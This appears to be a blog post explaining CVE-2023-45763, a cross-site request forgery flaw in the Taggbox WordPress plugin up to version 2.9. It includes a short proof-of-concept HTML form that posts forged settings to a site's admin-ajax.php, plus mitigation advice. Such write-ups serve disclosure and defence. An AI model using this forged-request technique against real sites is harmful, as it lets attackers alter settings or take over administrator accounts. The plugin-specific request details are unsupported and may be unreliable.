CVE-2023-45763: Exploring the Cross-Site Request Forgery (CSRF) Vulnerability in Taggbox Plugin Versions <= 2.9

It has recently come to light that there exists a Cross-Site Request Forgery (CSRF) vulnerability in the Taggbox Wordpress plugin, specifically in versions up to and including 2.9. The vulnerability allows attackers to perform unwanted actions on a web application while the user is believed to be authenticated. This blog post will provide you with an in-depth look into the vulnerability, its potential impact, and the exploit details, along with code snippets and references to the original sources.

Vulnerability Details

Name: Cross-Site Request Forgery (CSRF)
CVE ID: CVE-2023-45763
Affected Plugin: Taggbox
Affected Versions: <= 2.9

Original References

1. Taggbox Plugin CVE-Mitre entry
2. WordPress CVE Database

Exploit Details

The Taggbox Wordpress plugin versions <= 2.9 contain a CSRF vulnerability that can be exploited by sending a crafted HTTP request to the vulnerable application. An attacker can then leverage this vulnerability to perform malicious actions on the affected website.

Here is an illustrative example of the exploit

<!DOCTYPE html>
<html>
  <body>
    <h1>Taggbox Plugin CSRF Exploit POC</h1>
    <form method="POST" action="https://example.com/wp-admin/admin-ajax.php">;
      <input type="hidden" name="action" value="save_my_setting" />
      <input type="hidden" name="taggbox_setting[custom_css]" value="body {background-color: red !important;}" />
      <button type="submit">Click to Exploit</button>
    </form>
  </body>
</html>

In this Proof of Concept (POC), a simple HTML form sends a POST request with malicious custom CSS data to the "admin-ajax.php" of the target Wordpress site. If a logged-in administrator visits this crafted page and clicks the "Click to Exploit" button, the malicious code will change the background color of the website to red.

An attacker can use a similar technique to inject other malicious code or perform actions such as creating new administrator accounts, changing plugin settings, or even deleting content.

Mitigation

To mitigate the risks from this vulnerability, users should immediately update their Taggbox plugin to the latest available version. Always ensure that all plugins and themes on your Wordpress installation are kept up-to-date to minimize the risk of security vulnerabilities.

Conclusion

This blog post highlighted the CSRF vulnerability discovered in versions <= 2.9 of the Taggbox Wordpress plugin. The post included code snippets, exploit details, and links to original references. The key takeaway is the importance of keeping your plugins and themes up-to-date and using the latest available versions to protect your website from security vulnerabilities.

Timeline

Published on: 10/16/2023 11:15:45 UTC
Last modified on: 10/19/2023 14:19:30 UTC